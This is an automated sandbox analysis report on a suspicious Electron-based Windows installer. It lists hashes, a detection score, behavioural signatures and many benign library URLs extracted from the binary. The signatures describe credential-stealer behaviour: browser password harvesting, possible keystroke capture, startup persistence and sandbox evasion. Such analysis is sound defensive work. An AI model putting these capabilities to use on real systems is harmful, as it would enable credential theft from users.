Windows Analysis Report
Prismifyr_Installer_v2.1 Setup 1.0.0.exe

Overview

General Information

Sample name: Prismifyr_Installer_v2.1 Setup 1.0.0.exe
Analysis ID: 1541090
MD5: fe0ddf8159f4a56d194f90e1fb31f3b2
SHA1: adb5fcf6436b55cfd5391adc8e4d5725b2b1089b
SHA256: 753581951adf2c71ae3ddcd51b5badda3e91f16aa32d09596d24fa5397451fc2
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected generic credential text file
Drops PE files to the startup folder
Drops large PE files
Sigma detected: MSHTA Suspicious Execution 01
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Startup Folder File Write
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Uses 32bit PE files
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7b4c3a21-e2df-5efd-beb5-591edeb53a62 Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\LICENSE.electron.txt Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\LICENSE.electron.txt Jump to behavior
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: "ProgramDataBaseFileName": "$(IntDir)vc90b.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: "$(IntDir)$(ProjectName)\\vc80.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2475862062.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476010965.0000000002E0F000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476074048.0000000002E12000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: # the .pdb by the precompiled header step for .cc and the compilation of source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: - Use '<(PRODUCT_DIR)/<(product_name).(exe|dll).pdb' if 'product_name' is source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: CLEANFILES="$CLEANFILES *.lib *.dll *.pdb *.exp" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: - Use '<(PRODUCT_DIR)/<(target_name).(exe|dll).pdb'. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;; source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2397315857.0000000005223000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: config_name, self.ExpandSpecial, output + ".pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: # See comment at cc_command for why there's two .pdb files. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2278954943.0000000006B20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pdb = self.GetPDBName(config, expand_special, output_name + ".pdb") source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pdbpath_c = pdbpath + ".c.pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "ProgramDataBaseFileName": "$(IntDir)\\vc90b.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ** rbu_file.pDb!=0, then it is assumed to already be present on the source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2395663067.0000000005221000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdbpath_cc = pdbpath + ".cc.pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: "ProgramDatabaseFile": "Flob.pdb", source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\electron.exe.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2395663067.0000000005221000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdb_base = "{}.{}.pdb".format(pdb_base, TARGET_TYPE_EXT[target_dict["type"]]) source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461234245.0000000000849000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ** for all file descriptors with rbu_file.pDb!=0. If the argument has source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: config_name, self.ExpandSpecial, output + ".pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ** rbu_file.pDb!=0. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2388748403.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392116421.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2388942202.00000000055C0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059CC
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_004065FD FindFirstFileW,FindClose, 0_2_004065FD
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\locales Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop\lib Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked Jump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exe File opened: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\app.asar.unpacked\node_modules\screenshot-desktop Jump to behavior
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52560
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://blog.izs.me/)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://bugs.python.org/issue5752
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://certificates.godaddy.com/repository/gd_intermediate.crt0
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://certificates.godaddy.com/repository100.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cldr.unicode.org/index/downloads
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://code.activestate.com/recipes/576694/.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://code.google.com/p/chromium/issues/detail?id=76293
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://code.google.com/p/closure-compiler/wiki/SourceMaps
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://code.google.com/p/gyp/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://code.google.com/p/gyp/issues/detail?id=111):
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://code.google.com/p/gyp/issues/detail?id=122
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://code.google.com/p/gyp/wiki/GypLanguageSpecification
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://code.google.com/p/python-gflags/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://code.google.com/p/smhasher/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crbug.com/122592
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crbug.com/142362.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crbug.com/333738.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crbug.com/35878
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.godaddy.com/gds1-20
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://developer.android.com/tools/extras/support-library.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://developer.apple.com/library/mac/#documentation/DeveloperTools/Reference/XcodeBuildSettingRef/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/commonnode-set..
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://fossil-scm.org).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://git.linuxtv.org/v4l-utils.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://goo.gl/cuFbX
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://goo.gl/dhPnp
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://google.github.io/snappy/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://icl.com/saxon
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://icl.com/saxonorg.apache.xalan.xslt.extensions.RedirectxsltDocumentElem:
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2475862062.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476010965.0000000002E0F000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2478072599.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2476074048.0000000002E12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://int3.de/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://istanbul-js.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://maxao.free.fr/xcode-plugin-interface/specifications.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://n8.io/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://n8.io/)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000002.2535839594.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000000.2153082985.000000000040A000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.godaddy.com/0J
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://opensource.perlig.de/rjsmin/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://pages.citebite.com/v2o5n8l2f5reb))
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://public.kitware.com/Bug/view.php?id=8392
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://re-becca.org)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://re-becca.org/)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://s..
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://slproweb.com/products/Win32OpenSSL.html
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://source.android.com/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://source.android.com/compatibility)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://stackoverflow.com/a/62888/10333
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://stackoverflow.com/questions/1189781/using-make-dir-or-notdir-on-a-path-with-spaces
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://stackoverflow.com/questions/35817/whats-the-best-way-to-escape-ossystem-calls-in-python
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://stackoverflow.com/questions/37519828
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://substack.net)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tootallnate.net)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://web.archive.org/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://website-archive.mozilla.org/www.mozilla.org/mpl/MPL/NPL/1.1/):
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
